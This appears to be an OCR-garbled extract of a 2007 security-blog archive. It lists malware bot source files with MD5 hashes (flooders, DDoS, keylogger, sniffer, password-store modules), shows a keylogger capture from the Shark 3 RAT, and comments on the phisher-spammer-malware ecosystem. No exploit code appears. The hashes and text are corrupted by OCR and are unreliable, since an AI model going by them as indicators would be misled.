pingudp.h 
b86f6921f7a720d6e7b204fbeb34e8d4 
pstore.cpp 
6eb93ef5cb29c9b6394cf8c87a4debfa 
pstorec.tlh 
b89c05a4531df0fd30c67bfcecc62e01 
pstorec. tli 
92fdb3bb3207336cf4bb5bb64b6f0fa8 
rfb.h 
cf25478eafa82b934daa9el2e6ac46e2 
Rnd.cpp 
95475868f6c74ab83c2035falcf91372 


Rnd.h 
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2b967ad91294cb6e516f472bd86405e6 
Shel.cpp £7c095545504e3a171c4b1a26d4ea055 
Shel.h 
ea251b4be6f7cceefa9bcc0d256f2c5b 
sniff.cpp 
1le2e1f28818edd4029e13993fd9eebca 
sniff.h 
5eebe93de4e03bf0bb118e35997743a9 
socks4.cpp 
76d4a2402672a728e1cc76062b13fd7a 
socks4.h b103f307ff02cd98fe2bfbecbd19c011 
Str.h 
b4f12d31353a70ba007bd6eee061720f 
synflood.cpp 
c61b1d1fabff3705c2df81093f72d3a7 
synflood.h 
78df095c5aa59a0bfaa783e6edd38d0d 
Sys.cpp 
4c788567b4f66253009a563013a768e6 
Sys.h 
1¢327f8ff5f2a7053ef6a55bdec09781 
Tcp.h 
65281e657ace7f6ccd47f470ad100b5d 
tcpflood.cpp 
446953fc1d479001b8e2947e21f5966d 
tcpflood.h 
a9165cc828d623c51c297ec888803d9f 
tcpflood2.cpp 
72d9a1cc139450c3eacca0780b54e5b5 
tcpflood2.h 
aec74ba18c2502e78a761a0564087eed 
tcpip.h 
3464effd01374f2732b9c95252af9740 
Test.cpop 18d0756b38b7cf0Obd2fc19cafb8745c 
Test.h 
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e€a381ed0166cd1291e8bbf09b8b0250f 
Thr.cpp 
1946ba69fc21c87d4f3f516413a3fb14 
Thr.h 
Obca4c661lace26fc79cb732d44943673 
ver.c 
96bc28bdb5f658224488715da4264095 
ver.h 
6620d6b2e364aa00c67d8f6ba2bd6872 
120.bak 
2ed3923a2bac11502a7ac4f3397386b2 
drxb.exe2 
66d3c4050df0de9c1257b81dd15c40a3 
pstorec.tlh 
b12315617f7b73d37d445e515edfd62d 
pstorec.tli 
cb05a644d5d5d943a70b13dcb0a7aff3 
mssql.cpp 
ecf38ff8f9c8b48d035albd14a9d38d4 
mssql.h 
742394ed531laab2ecc958daf5305723e 
Netapi.cpp 
79ddbc8d84d96ec83d328aa4f98ca4c7 
Netapi.h 14381a22f0b04e78d1513ebfbe76a805 
netbios.cpp 
d3fefc2b953a90c23d1fe78314793970 
netbios.h 
e027ed5a6f27598f67628a4ab33c82cd 
pstore.cpp 
c4456a4a2f27f36ff974533cafffbe60 
Sym.cpp 
23d55b1c2b78d6586e3efdc631dd51e8 
Sym.h 
ab712d424efc398db3bbea274487c096 
vncshit.cpp 
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f77e664ea4f477cb3be9cb8ba5800f08 
vncshit.h 
8363f5bedeb49d57a79f1739e2218eda 
120.cpp 
126d09fbd00fc56bea738a338af585b6 
120.dsp 
6f2c6dd8a36ecdb99690de8f6b75e66f 
120.dsw 
ac5b003d9f3b7b3f613652b01e1c1454 
120.h 
b0ea6b82195207d090e6c24d61980c93 
120.ico 
clf0feb36e6cdfbf699525c72a683d0e 
120.ncb 
11351a01c90ef46bff99194a5c4f3012 
120.opt 
3140ae74b653b6335c31a5f1069941f60 
120.plg 
429fefbfe5f5dce15e47ff6910bb37cf 
120.rc 
e3d778e0ff3a77de7a3145a17626d740 
1lreadme.txt 
5816c92688f435946cdb665f9c76a970 
Adv.cpp 
0c0b5c3e3ab3758c9a21e23c0dd676b3 
Adv.h 
087d0176e8cee3f1291d4b48b4e20479 
botkiller.cpp 
03c6b85198decd1ff8ccd782a86acfd4 
botkiller.h 
a71e71de8fb056658439934327df0ed0 
CleanUp.bat 
d1db23a544ee2f7bca4adc252dae33bf 
Cmd.h 
e73af685d00a799eedc313c0a8499ba6 
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Conf.h 
bb632dabe49822f87d21cb54ff0d99a7 
Crc.cpp 
b8f60e826f3f161571d8e3f7b08465f5 
Crc.h 
024f7f17b3dac4091c5e80d032b98ec4 
Cry.cpp 
f7ba66714eb3e544766ba5e2e4b7a27e 
Cry.h 
c49e198e5a1c4f634d6f97002883c5bc 
d3des.c 
€259805a2bae810b780140dd388c1191 
d3des.h 
35cd1a965963d32df92f8087ff642cd1 
ddos.cpp a/7bd4791b0388a510f8b3f66a1011e5e 
ddos.h 
11b29bda556a1770d027600fbb87dd55 
Def.h 
46fae457dd61317a89295e9506179851 
encrypt.exe 
e€20f3260419d966d4393fac3ab17654c 
Ext.h 
8bebe4536da2231060dced945955edac 
ftpd.cpp 23dd23decd0964dd8e5a6cbhd7e2886bc 
ftpd.h 
48a891506c957340b207b627105d7bb4 
Fun.h 
08a9e5038a76c9be299324b0757a8302 
Glo.h 
c96e029def5b6da17307d935dbeafeee 
icmpflood.cpp 
9f5517830b89419f8c55da5f0b08424d 
icmpflood.h 
4462c6318220648820316848deb124fd 


Ide.cpp 
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98dc154eab6153d133187eb189dfc7f3 
Ide.h 
0b892636d518555f5336a230e30cc906 
Inc.h 
ac099cOb8b6f4d24a66114363e9b080c 
Key.cpp 
16cdf4f8588d213c0ce1lc6ec5544al14a 
Key.h 
Obf55d672ea6889bb0739329fc781208 
Ldll.cop a99c9ff6éecbc05289c74e03b34d7c8fc 
Ldll.h 
€93576952251lef0ebc906c9f78eb629e 
passwd.h 50cee4baal6cb6a072ee6fa6114ff2de 
patcher.cpp 
8cd1760ea0ae3b8f82a8d06e82773c3c 
patcher.h 
70e1a30467b0f3b69ebe4661b518cfce 
pingudp.cpp 
392c0955449dae6c2467a2605add668a 
pingudp.h 
b86f6921f7a720d6e7b204fbeb34e8d4 
pstore.cpp 
6eb93ef5cb29c9b6394cf8c87a4debfa 
pstorec.tlh 
b89c05a4531df0fd30c67bfcecc62e01 
pstorec.tli 
92fdb3bb3207336cf4bb5bb64b6f0fa8 
rfb.h 
04d6bd675ae235411f6f6a33a0e8e147 
Rnd.cpp 
95475868f6c74ab83c2035falcf91372 
Rnd.h 
2b967ad91294cb6e516f472bd86405e6 
Shel.cpp f7c095545504e3a171c4b1a26d4ea055 
Shel.h 
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ea251b4be6f7cceefa9bcc0d256f2c5b 
sniff.cpp 
le2e1f28818edd4029e13993fd9eebca 
sniff.h 
5eebe93de4e03bf0bb118e35997743a9 
socks4.cpp 
76d4a2402672a728e1cc76062b13fd7a 
socks4.h b103f307ffO2cd98fe2bfbecbd19c011 
Str.h 
b4f12d31353a70ba007bd6eee061720f 
synflood.cpp 
c61b1d1fabff3705c2df81093f72d3a7 
synflood.h 
78df095c5aa59a0bfaa783e6edd38d0d 
Sys.cpp 
4c788567b4f66253009a563013a768e6 
Sys.h 
1c327f8ff5f2a7053ef6a55bdec09781 
Tcp.h 
65281e657ace7f6ccd47f470ad100b5d 
tcpflood.cpp 
446953fc1d479001b8e2947e21f5966d 
tcpflood.h 
a9165cc828d623c51c297ec888803d9F 
tcpflood2.cpp 
72d9a1cc139450c3eacca0780b54e5b5 
tcpflood2.h 
aec74ba18c2502e78a761a0564087eed 
tcpip.h 
3464effd01374f2732b9c95252af9740 
Test.cpp 18d0756b38b7cf00bd2fcl19cafb8745c 
Test.h 
e€a381ed0166cd1291e8bbf09b8b0250f 
Thr.cpp 
1946ba69fc21c87d4f3f516413a3fb14 
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Thr.h 
Obca4c661ace26fc79cb732d44943673 
ver.c 
96bc28bdb5f658224488715da4264095 
ver.h 
6620d6b2e364aa00c67d8f6ba2bd6872 
vncshit.cpp 
4062d0cdd076481a7fbc458b7a8bff57 
vncshit.h 
€88a41f3eb5a443633e233221b6d30a4 
mssqlI.cpp 
ecf38ff8f9c8b48d035albd14a9d38d4 
mssqI.h 
742394ed531laab2ecc958daf5305723e 
Netapi.cpp 
79ddbc8d84d96ec83d328aa4f98ca4c7 
Netapi.h 14381a22f0b04e78d1513ebfbe76a805 
netbios.cpp 
d3fefc2b953a90c23d1fe78314793970 
netbios.h 
e027ed5a6f27598f67628a4ab33c82cd 
pstore.cpp 
€4456a4a2f27f36ff974533cafffbe60 
Sym.cpp 
23d55b1c2b78d6586e3efdc631dd51e8 
Sym.h 
ab712d424efc398db3bbea274487c096 
vncshit.cpp 
f6b601fcfd2ae1ld134c0dd08387c05ad 
vncshit.h 
e88a41f3eb5a443633e233221b6d30a4 
120.cpp 
c7ec538e296059bba517863a1b9ec68c 
120.dsp 
02736c6d6dfc892530157a615c2162f9 
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120.dsw 
ac5b003d9f3b7b3f613652b01e1c1454 
120.h 
a15b6e3aec1615987ba6893bfcbc592f 
120.ico 
clf0feb36e6cdfbf699525c72a683d0e 
120.opt 
b0f3c50c5727605be2096fc7a00d234c 
120.plg 
8abfab12445478f5acc048f836eda291 
120.rc 
676eebd28fd44cde86c701857ed50769 
Adv.cpp 
66e84147969201776de022fadca8bb76 
Adv.h 
287bdeel2a102aeb33d79067c7e328c0 
CleanUp.bat 
d1db23a544ee2f7bca4adc252dae33bf 
Cmd.h 
f3b4e263ca0b52f6b5f9a2e901fdf885 
Conf.h 
a2d2a8d84d700b414e967d35ca43f6f4 
Crc.cpp 
f8f8f36234f11fc2148fbb06912ca454 
Crc.h 
fee33b0009142a39a062c9ae2eddOfb8 
Cry.cpp 
3721dec52ab96f8374c24b29ce44dac8 
Cry.h 
68f4927efd75fc1314316ed63dec5a02 
ddos.cpp fd75afad4cd9722913611587510113f2 
ddos.h 
30a540317bf24202fb82408e4582200c 
Def.h 
f82a0f97774beaclaa7f9af7ea95052F 
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4 shark ) (192. 168.46 22) - shark 3.0.0 eee! 


{STRG LEFT)¢{STRG LEFT} (ENTER) 


[17.10.2007 21:36:31 - mIRC 6.21 eae ~ [eshiark [8] [+nrt}: 
https // 
{STRG LEFT} v(ENTER}s0? (ENTER) 


[17.10.2007 21:37:37 - s_Chent - Microsoft Visual Basic [Entwerfen] - (frmkeylog (Code) ]} 
(ENTER if text(0).te = (SHIFT RIGHT)" then exit subs 


[17.10.2007 21:38:39 - 


Menw-fditor) 
Z{ENTER) 3(ENTER)} S4[ENTER) S(ENTER)}G{ENTER) 7(ENTER)S 


1 | 
ik (ENTER is aber auch besser (ENTER sieht man de furk direkt (EVTER |hehe (ENTER ga ne sone highight funkton is schon was feines (ENTER) (BACK) beim hi 
(SHIFT RIGHT)"n zeigt er auch direkt an wieviele matches es gbt (ENTER) 

(17.10.2007 21:42:33 - s_Client - Microsoft Visual Basic [Entwerfen] - [firmKeylog (Code) ]] 

for {SHIFT RIGHT}{ARROW LEFT) {BACK}{ARROW RIGHT) {SHIFT RIGHT}{SHIFT RIGHT}{SHIFT RIGHT}{SHIFT RIGHT}{SHIFT RIGHT}{SHIFT RIGHT}{SHIFT [| 
RIGHT) (SQFT RIGHTISHEFT RIGHT)" (SHIFT RIGHT} (SIFT RIGHT) (SHGFT RIGHT) (SHSFT RIGHT}(SMIFT RIGHT)(SMIFT RIGHT){SHIFT RIGHT)(SHIFT RIGHT) 
(SHIFT RIGHT}° & text@09 & (SHIFT RIGHT) °(SHIFT RIGHT} (SHIFT RIGHT} (SHIFT RIGHT} (SFT RIGHT} (SeaPT RIGHT}{(SHIFT RIGHT}"(ARROW saath in aman 
LEFT) (ARROW LEFT (ARROW LEFT}(ARROW LEFT}{BACK))(STRG LEFTISFS) 


(17.10.2007 21:43:36 - HEE 3.0.0) 


sa [anoa (aie —] Gmioree] 


OfflogRecewwed Sire: 12,51 KB J Logtime: 00 hrs, 00 mins, 02 secs 


a 
’ 


[21:56:83]: Recetved Offine Keylog! CPULosd: 17% Memory Load: 25% (127,91 MB / $11,338) Ide: 00:00:00 Ping: 1ms 


Shark3 Keylogger 


[3] 
[4] 


Previous versions included features not so popular among RATS by default such as, built-in 
VirusTotal submission, process injection, and with the new version promoted to have a built-in 
rootkit capabilities, next to its Vista compatibility, let’s ask the ultimate question - [5]is it a 
RAT, or is it a malware? That’s the rhetorical question. 


1. http: //ddanchev. blogspot .com/2007/08/shark-2-diy-malware.htm 


2. http://www. theregister.co.uk/2007/08/15/shark_trojan_creation_kit/ 
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encrypt.exe 
e€20f3260419d966d4393fac3ab17654c 
Ext.h 
dbcal112013cf5eeac796205ceb1024c5 
Fun.h 
21dd0ab1897cc4cdf6e36f7dad2f2fd3 
Glo.h 
c96e029def5b6dal17307d935dbeafeee 
Ide.cpp 
5af0e8856dd215c2d408a7b7e43a209c 
Ide.h 
8a2194a0b52d9c0588daebe50b72e7dc 
Inc.h 
4d535e54d808cdfa2ccf848f8ab0b0e9 
Ldil.cpp b965343fd9512c9b969aab1241f3c031 
Ldll.h 
2d449d631flede65f6b35850404b6055 
Pas.h 
afb1899a0f767e90ff9bd22209ab0e66 
Rnd.cpp 
27ef23d7d3b6e15eb6ccdd7674251ca8 
Rnd.h 
773602a01e847334df6100af4a26c3d4 
Shel.cpp 93287f9e08ee07d1bca553b541ff031e 
Shel.h 
bcfd1e03c33a67ddabc6f33el1alb54a6 
Str.h 
3082eb59a49b540e006b879b0ad4c1c2 
Sys.cpp 
df9558bf969f915e20a2f1b737bc567b 
Sys.h 
3230d67a188e32b532cc9b22a3e99072 
Tcp.h 
5680e8e630e33ed8f84b552fald14b87 
Test.cpp 04bdc970cc63b08196baca3a73faa2ce 
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Test.h 
e996ba078dc4ae97483506f6d5aleabc 
Thr.cpp 
263d181d72a4082b0cc4a47132de8df4 
Thr.h 
a881351d00ae32899c94a69Ff7 7379120 
Asn.cpp 
9947a2456df330e3421a2f462378dfbb 
Asn.h 
c57e30fde41b1dfal1a159234e4e6475 
Netapi.cpp 
f2b0a9490d4579ebalcObffdd06d02f0 
Netapi.h 14381a22f0b04e78d1513ebfbe76a805 
Netbios.cpp 
132d4a6fd75c76f2bd6dab6c6b06566fd 
Netbios.h 
a54523937044e354c94fa932139b5cf9 
Pnp.cpp 
0e8479818d8c01210368a3490c76dcd4 
Pnp.h 
5a320966fb8e40736cbe0b9a51b5c253 
Sym.cpp 
664f810ffa736810660e302bc228956d 
Sym.h 
ab712d424efc398db3bbea274487c096 
Vnc.cpp 
013428cc3743c2c7874c6c099657eecc 
vnc.h 
091d289ad5beebf2b717054dc8dea837 
120.cpp 
9d9178743868f33e452b5fb460b8dc8c 
120.dsp 
99dc208252c0a05e8000543b8eeb7d06 
120.dsw 
ac5b003d9f3b7b3f613652b01e1c1454 
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120.h 
b0ea6b82195207d090e6c24d61980c93 
120.ico 
c1lf0feb36e6cdfbf699525c72a683d0e 
120.ncb 
b5476e1684b2449a9c7a3aec09b70c6b 
120.opt 
ae83f4488f1b6076d3b837331b313c06 
120.plg 
df44ac7c15c76f48f7fd6é8ddcdfb749a 
120.rc 
e3d778e0ff3a77de7a3145a17626d740 
1lreadme.txt 
5816c92688f435946cdb665f9c76a970 
Adv.cpp 
0c0b5c3e3ab3758c9a21e23c0dd676b3 
Adv.h 
087d0176e8cee3f1291d4b48b4e20479 
botkiller.cpp 
03c6b85198decd1ff8ccd782a86acfd4 
botkiller.h 
a71e71de8fb056658439934327df0ed0 
CleanUp.bat 
d1db23a544ee2f7bca4adc252dae33bf 
Cmd.h 
e73af685d00a799eedc313c0a8499ba6 
Conf.h 
48f7b7d4f0817d20bdf3684e42275c5d 
Crc.cpp 
b8f60e826f3f161571d8e3f7b08465f5 
Crc.h 
024f7f17b3dac4091c5e80d032b98ec4 
Cry.cpp 
f7ba66714eb3e544766ba5e2e4b7a27e 
Cry.h 
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c49e198e5alc4f634d6f97002883c5bc 
d3des.c 
€259805a2bae810b780140dd388c1191 
d3des.h 
35cd1a965963d32df92f8087ff642cd1 
ddos.cpp b5cOdffd7fde3bae3a5c718f9fe59bb0 
ddos.h 
7ce2a854d8259063a106d9fd0acdfd29 

Def.h 

6e9c788771aaed9604b6c1ba59d8d013 
encrypt.exe 
e€20f3260419d966d4393fac3ab17654c 

Ext.h 

8bebe4536da2231060dced945955edac 
ftpd.cpp 23dd23decd0964dd8e5a6cbhd7e2886bc 
ftpd.h 
48a891506c957340b207b627105d7bb4 
Fun.h 
08a9e5038a76c9be299324b0757a8302 

Glo.h 

c96e029def5b6da17307d935dbeafeee 
Ide.cpp 
98dc154eab6153d133187eb189dfc7f3 

Ide.h 

0b892636d518555f5336a230e30cc906 

Inc.h 

190a4ae3c6d6a0b00f2fd94cd97daed6 
Key.cpp 
16cdf4f8588d213c0celc6ec5544al14a 

Key.h 

Obf55d672ea6889bb0739329fc781208 
Ldlil.cpp a99c9ff6éecbc05289c74e03b34d7c8fc 
Ldll.h 

€93576952251ef0ebc906c9f78eb629e 
passwd.h 50cee4baal6cb6a072ee6fa6114ff2de 
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patcher.cpp 
8cd1760ea0ae3b8f82a8d06e82773c3c 
patcher.h 
70e1a30467b0f3b69ebe4661b518cfce 
pstore.cpp 
6eb93ef5cb29c9b6394cf8c87a4debfa 
pstorec.tlh 
b89c05a4531df0fd30c67bfcecc62e01 
pstorec.tli 
92fdb3bb3207336cf4bb5bb64b6f0fa8 
rfb.h 
04d6bd675ae235411f6f6a33a0e8e147 
Rnd.cpp 
95475868f6c74ab83c2035falcf91372 
Rnd.h 
2b6967ad91294cb6e516f472bd86405e6 
Shel.cpp f7c095545504e3a171c4b1a26d4ea055 
Shel.h 
ea251b4be6f7cceefa9bcc0d256f2c5b 
sniff.cpp 
1le2e1f28818edd4029e13993fd9eebca 
sniff.h 
5eebe93de4e03bf0bb118e35997743a9 
socks4.cpp 
76d4a2402672a728e1cc76062b13fd7a 
socks4.h b103f307ff02cd98fe2bfbecbd19c011 
Str.h 
b4f12d31353a70ba007bd6eee061720f 
Sys.cpp 
4c788567b4f66253009a563013a768e6 
Sys.h 
1¢327f8ff5f2a7053ef6a55bdec09781 
Tcp.h 
65281e657ace7f6ccd47f470ad100b5d 
tcpip.h 
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3464effd01374f2732b9c95252af9740 
Test.cpp 18d0756b38b7cf0Obd2fc19cafb8745c 
Test.h 
e€a381ed0166cd1291e8bbf09b8b0250f 
Thr.cpp 
1946ba69fc21c87d4f3f516413a3fb14 
Thr.h 
Obca4c661lace26fc79cb732d44943673 
ver.c 
96bc28bdb5f658224488715da4264095 
ver.h 
6620d6b2e364aa00c67d8f6ba2bd6872 
vncshit.cpp 
Od2c58d4e6bac9d2dacc10b4755486ac 
vncshit.h 
€88a41f3eb5a443633e233221b6d30a4 
mssql.cpp 
ecf38ff8f9c8b48d035albd14a9d38d4 
mssql.h 
742394ed531laab2ecc958daf5305723e 
Netapi.cpp 
79ddbc8d84d96ec83d328aa4f98ca4c7 
Netapi.h 14381a22f0b04e78d1513ebfbe76a805 
netbios.cpp 
d3fefc2b953a90c23d1fe78314793970 
netbios.h 
e027ed5a6f27598f67628a4ab33c82cd 
pstore.cpp 
c4456a4a2f27f36ff974533cafffbe60 
Sym.cpp 
23d55b1c2b78d6586e3efdc631dd51e8 
Sym.h 
ab712d424efc398db3bbea274487c096 
vncshit.cpp 
f6ob601fcfd2ae1d134c0dd08387c05ad 
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vncshit.h 
€88a41f3eb5a443633e233221b6d30a4 
120.cpp 
2562812d261ed14809f5becaf6cdd081 
120.dsp 
8bd2b82b4b09f0b0130ab74a2eace473 
120.dsw 
ac5b003d9f3b7b3f613652b01e1c1454 
120.h 
a15b6e3aec1615987ba6893bfcbc592f 
120.ico 
c1f0feb36e6cdfbf699525c72a683d0e 
120.ncb 
fO88b8beec795a6ed23745d733c89ab2 
120.opt 
f4fodf045d88d15c0ee295edf1f33556 
120.plg 
ba673bc570e5ff6264a2cff7ebf06d47 
120.rc 
676eebd28fd44cde86c701857ed50769 
Adv.cpp 
f08095c5c5c264e8964a64d6286d6bbf 
Adv.h 
287bdeel2a102aeb33d79067c7e328c0 
botkiller.cpp 
03c6b85198decd1ff8ccd782a86acfd4 
botkiller.h 
a71e71de8fb056658439934327df0ed0 
CleanUp.bat 
d1db23a544ee2f7bca4adc252dae33bf 
Cmd.h 
70c2eae4f52c272c63aa2a59597203d6 
Conf.h 
d603384bd096be36c24cd7d9f46ea217 
Crc.cpp 
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f8f8f36234f11fc2148fbb06912ca454 
Crc.h 
fee33b0009142a39a062c9ae2eddOfb8 
Cry.cpp 
450ad6c95f6c28d8a65d69f0f1f0018e 
Cry.h 
68f4927efd75fc1314316ed63dec5a02 
d3des.c 
e€259805a2bae810b780140dd388c1191 
d3des.h 
35cd1a965963d32df92f8087ff642cd1 
ddos.cpp fd75afad4cd9722913611587510113f2 
ddos.h 
30a540317bf24202fb82408e4582200c 
Def.h 
46df488cel2ea75dfaaae685fae271df 
encrypt.exe 
e€20f3260419d966d4393fac3ab17654c 
Ext.h 
182f63cb0d9ab34de030228188d6a64a 
ftpd.cpp 23dd23decd0964dd8e5a6cbhd7e2886bc 
ftpd.h 
48a891506c957340b207b627105d7bb4 
Fun.h 
3c822946eedd713ca709060cc98a5453 
Glo.h 
c96e029def5b6dal17307d935dbeafeee 
Ide.cpp 
5af0e8856dd215c2d408a7b7e43a209c 
Ide.h 
8a2194a0b52d9c0588daebe50b72e7dc 
Inc.h 
4c06ee473497d287be3914dbea64a5e5 
Key.cpp 
16cdf4f8588d213cOce1lc6ec5544a14a 
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Key.h 
Obf55d672ea6889bb0739329fc781208 
Ldll.cpp 29c604bd6314004cd17361a725e3ad8f 
Ldll.h 
2d449d631flede65f6b35850404b6055 
navicopa.cpp 
€90327cb351de9ec550cf29a02eb1712 
navicopa.h 
ba3f8f43a980f3b3bc17b4d93827ed76 
passwd.h 714de0e741da322020b68948b5d42ef6 
patcher.cpp 
Odf064223bcc9dc32dd8d7152c33871e 
patcher.h 
70e1a30467b0f3b69ebe4661b518cfce 
rfb.h 
04d6bd675ae235411f6f6a33a0e8e147 
Rnd.cpp 
d9f71315e9919e04e6968606efff3e56 
Rnd.h 
ece9c76d62ac4d37a8af5b31460f0847 
Shel.cpp 93287f9e08ee07d1bca553b541ff031e 
Shel.h 
bcfd1e03c33a67ddabc6f33e1alb54a6 
sniff.cpp 
74fe63c205a2b785f7586fe43cba9f3f 
sniff.h 
5eebe93de4e03bf0bb118e35997743a9 
Str.h 
6ffec6ed6d2cb9170c227d623c4e51d1 
Sys.cpp 
62c60d515cc93b1dcb490c57b5d06417 
Sys.h 
3230d67a188e32b532cc9b22a3e99072 
Tcp.h 
5680e8e630e33ed8f84b552fald14b87 
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tcpip.h 
3464effd01374f2732b9c95252af9740 
Test.cpp 04bdc970cc63b08196baca3a73faa2ce 
Test.h 
e996ba078dc4ae97483506f6d5aleabc 
Thr.cpp 
0b7714505d4e0fec91567189d9dd3fa9 
Thr.h 

6aeIe4fb7 98b6f5fab33def9994898F9 
ver.c 
96bc28bdb5f658224488715da4264095 
ver.h 
6620d6b2e364aa00c67d8f6ba2bd6872 
vncshit.cpp 
b918a73b9f6748a0d8b0f3629c6222ae 
vncshit.h 
e88a41f3eb5a443633e233221b6d30a4 
mssql.cpp 
f45045f6acaded569efd509b836017aa 
mssql.h 
742394ed531laab2ecc958daf5305723e 
Netapi.cpp 
f2b0a9490d4579ebalcObffdd06d02f0 
Netapi.h 14381a22f0b04e78d1513ebfbe76a805 
Sym.cpp 
664f810ffa736810660e302bc228956d 
Sym.h 
ab712d424efc398db3bbea274487c096 
vncshit.cpp 
fob601fcfd2ae1d134c0dd08387c05ad 
vncshit.h 
e88a41f3eb5a443633e233221b6d30a4 
120.cpp 
58f91822c034c1862d984f911ddeec83 
120.dsp 
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3. bttp://2.bp.blogspot.com/_wICHhTiQmrA/R1lykNqehXtI/AAAAAAAABOE/pMoFGQi_HG4/s1600-h/shark3_remote_memory_ex 
4. bttp://2.bp.blogspot.com/_wICHhTiQmrA/R1ykNqehXtI/AAAAAAAABOE/pMoFGQi_HG4/s1600-h/shark3_remote_memory_ex 
5. 


3.12.5 Phishers, Spammers, and Malware Authors Clearly Consolidating 
(2007-12-10 04:38) 


an 


In a recent article entitled "[1]Popular Spammers Strategies and Tactics" | emphasized on the 
consolidation that’s been going on between phishers, spammers and malware authors for a 
while : 


"The allure of being self-sufficient doesn’t seem to be a relevant one when it comes to 
a spammer’s results oriented attitude. [2]Spammers excel at harvesting and purchasing 
email addresses, sending, and successfully delivering the messages, phishers are masters of 
social engineering, while on the other hand malware authors or botnet masters in this case, 
provide the infrastructure for both [3]the fast-fluxing spam and scamsin the form of infected 
hosts. We’ve been witnessing this consolidation for quite some time now, and some of the 
recent events greatly illustrate this development of an [4]underground ecosystem. Take for 
instance the cases when spam comes with [5]embedded keyloggers, when [6]phishing emails 
contain malware, and a rather ironical situation where [7]malware infected hosts inside Pfizer 
are spamming viagra emails." 


The recently [8]uncovered breach at the U.S Oak Ridge National Laboratory is a perfect 
example of some of the key concepts | covered in the article, namely, harvesting of the emails 
courtesy of the spammers, segmenting the emails database for [9]targeted mailings on a per 
company, institution basis, and malware authors eventually purchasing the now segmented 
databases for such targeted attacks with the spammers earning a [10]higher profit margin for 
[11]providing the service of segmentation : 


"The unknown attackers managed to access a non-classified computer maintained by the 
Oak Ridge National Laboratory by sending employees hoax emails that contained malicious 
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1e89d405037110bb9f53f4754088199a 
120.dsw 
ac5b003d9f3b7b3f613652b01e1c1454 
120.h 
a15b6e3aec1615987ba6893bfcbc592f 
120.ico 
clf0feb36e6cdfbf699525c72a683d0e 
120.ncb 
108d1e923d861a14ae69aed0fd9e126c 
120.opt 
5a8dbf6306e427829ec833156e3e0f67 
120.plg 
8df203bd43985afccd544322c9d35c3b 
120.rc 
676eebd28fd44cde86c701857ed50769 
Adv.cpp 
798a06c4dbale870e7f7034cd239acad 
Adv.h 
287bdeel2a102aeb33d79067c7e328c0 
botkiller.cpp 
03c6b85198decd1ff8ccd782a86acfd4 
botkiller.h 
a71e71de8fb056658439934327df0ed0 
CleanUp.bat 
d1db23a544ee2f7bca4adc252dae33bf 
Cmd.h 
70c2eae4f52c272c63aa2a59597203d6 
Conf.h 
dd8cd8851b75d855185406cd75e9bcd1 
Crc.cpp 
f8f8f36234f11fc2148fbb06912ca454 
Crc.h 
fee33b0009142a39a062c9ae2eddO0fb8 
Cry.cpp 
450ad6c95f6c28d8a65d69f0f1f0018e 
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Cry.h 
68f4927efd75fc1314316ed63dec5a02 
d3des.c 
€259805a2bae810b780140dd388c1191 
d3des.h 
35cd1a965963d32df92f8087ff642cd1 
ddos.cpp fd75afad4cd9722913611587510113f2 
ddos.h 
30a540317bf24202fb82408e4582200c 
Def.h 
46df488cel2ea75dfaaae685fae271df 
encrypt.exe 
e€20f3260419d966d4393fac3ab17654c 
Ext.h 
182f63cb0d9ab34de030228188d6a64a 
Fun.h 
3c822946eedd713ca709060cc98a5453 
Glo.h 
c96e029def5b6dal17307d935dbeafeee 
Ide.cpp 
5af0e8856dd215c2d408a7b7e43a209c 
Ide.h 
8a2194a0b52d9c0588daebe50b72e7dc 
Inc.h 
87e220ac363fac446bcc2b29aec69bc0 
Key.cpp 
16cdf4f8588d213c0ce1lc6ec5544al14a 
Key.h 
Obf55d672ea6889bb0739329fc781208 
Ldll.cpp 29c604bd6314004cd17361a725e3ad8f 
Ldll.h 
2d449d631flede65f6b35850404b6055 
patcher.cpp 
Odf064223bcc9dc32dd8d7152c33871e 
patcher.h 
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70e1a30467b0f3b69ebe4661b518cfce 
rfb.h 
04d6bd675ae235411f6f6a33a0e8e147 
Rnd.cpp 
d9f71315e9919e04e6968606efff3e56 
Rnd.h 
ece9c76d62ac4d37a8af5b31460f0847 
Shel.cpp 93287f9e08ee07d1bca553b541ff031e 
Shel.h 
bcfd1e03c33a67ddabc6f33e1a1b54a6 
sniff.cpp 
33f3e173a37201149aa277d0a9c074a9 
sniff.h 
5eebe93de4e03bf0bb118e35997743a9 
Str.h 
a9c544a6ffc2c23a1b320ac9e1550200 
Sys.cpp 
62c60d515cc93b1dcb490c57b5d06417 
Sys.h 
3230d67a188e32b532cc9b22a3e99072 
Tcp.h 
5680e8e630e33ed8f84b552fald14b87 
tcpip.h 
3464effd01374f2732b9c95252af9740 
Test.cpp 04bdc970cc63b08196baca3a73faa2ce 
Test.h 
e996ba078dc4ae97483506f6d5aleabc 
Thr.cpp 
0b7714505d4e0fec91567189d9dd3fa9 
Thr.h 
6ae9e4fb798b6f5fab33def9994898F9 
ver.c 
96bc28bdb5f658224488715da4264095 
ver.h 
6620d6b2e364aa00c67d8f6ba2bd6872 
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vncshit.cpp 
2e€44602244211727280c60342bb0523d 
vncshit.h 
e88a41f3eb5a443633e233221b6d30a4 


120.exe 
fb487841c55ec67576232b79109c2947 
120.obj 
b25850747045ced48cc073a752e14ea8 
120.pch 
bab47296429aa6c514c35da97d83d55c 
Adv.obj 
43d5ec6e00df878e9183a2f4168f6859 
Crc.obj 
2e4051d4565dd167b231d53ab2af777d 
Cry.obj 
4f9a04c7e5d424071cd90859b1c41d20 
d3des.obj 
a22861e824a01c3090a7c88b61bc2095 
Ide.obj 
0e66b9ef136034073374e5ad07d79e25 
Key.obj 


7855849c78f56078ced0e7c9alab8e7c 


Ldil.obj c7c6aa76cae7e42d86e8e5c1e12a47d0 


mohaa.obj 
ced240e42daae27cfe56c340c0438868 
Netapi.obj 
6734775bf4ad90c6b013228701ealdf2 
patcher.obj 
d92c95c136c987a9506eceble65fe7c8 
Rnd.obj 
2a62fcdcae7005cd4a4bdcelcec9b169 


Shel.obj 71484ab3278f84bce5efda4992e382d6 


sniff.obj 
072028d536ee3ffab87fb301lacdd63e6 
Sym.obj 
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8c571c7cc3be0d8cb96e444e7fc0a3fa 
Sys.obj 
f9d254f642bb8265ff5dcbecel19a80bc 
systfile.exe 
66c4b044a018ee5189d58268b0ff2609 
Test.obj 10a37a6fbac839e22f695b0d1ad8415d 
Thr.obj 
e587ca553b773b39b1laf0adfab6ébab66f 
vc60.idb 3f01bf8b975728f1129f969fcfce3ea2 
ver.obj 
825fa079df9fd1779a3400e0535b818d 
vncshit.obj 
40efcle86e71b7751c5ae752acb61dc4 
120.exe 
